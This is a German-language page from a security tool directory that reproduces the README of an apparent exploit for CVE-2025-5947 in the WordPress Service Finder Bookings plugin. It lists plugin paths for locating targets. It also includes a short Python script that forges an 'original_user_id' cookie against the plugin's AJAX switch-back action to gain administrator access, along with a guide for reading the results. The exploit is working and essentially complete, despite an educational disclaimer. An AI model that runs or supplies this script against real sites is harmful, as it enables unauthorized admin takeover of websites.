Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-5947_Exploit — Ein Mini-Exploit für das Service Finder -Bookings Plugin WP | Kitploit
Tools/GitHubGitHub/m4rgs/cve-2025-5947_exploit
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubm4rgs/cve-2025-5947_exploit

CVE-2025-5947_Exploit

Ein Mini-Exploit für das Service Finder -Bookings Plugin WP

Repository anzeigen
1vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🔍 WordPress-Plugin-Exploit — Service Finder (sf-booking)

Übersicht

Das Service Finder-Plugin ist ein Buchungs- und Dienstleistungsverwaltungssystem für WordPress.
Aufgrund seiner Beliebtheit und Komplexität wiesen einige Versionen Sicherheitsprobleme im Zusammenhang mit nicht authentifizierten AJAX-Endpunkten oder unzureichenden Zugriffskontrollen auf.

Dieses README erklärt, wie Forscher Installationen sicher identifizieren und ethische Praktiken befolgen können (dbr krk).


Verwundbare WP-Dorks

/wp-content/plugins/service-finder/

/wp-content/plugins/service-finder-bookings/

/wp-content/plugins/sf-booking/


Exploit-Workflow

⚠️ Haftungsausschluss:
Diese Suchen dienen ausschließlich Bildungs- und Forschungszwecken. Versuchen Sie keinen unbefugten Zugriff oder Exploit.

root@kitploit:~
import requests

url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
    'original_user_id': '1',
}

r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
  • 300-399: ✅ VERWUNDBAR! Weiterleitung zum Admin-Panel als ADMIN
  • 400-499: ⚠️ Client-Fehler — die Anfrage war ungültig oder unbefugt, nicht verwundbar

Referenzen

  • WPScan-Plugin-Datenbank — https://wpscan.com/plugins/
  • National Vulnerability Database (NVD) — https://nvd.nist.gov/
  • OWASP — Google-Dorking-/Aufklärungstechniken
  • HackerOne-Offenlegungsrichtlinien — https://www.hackerone.com/disclosure-guidelines

Autor

Taha Mounir


Tool herunterladen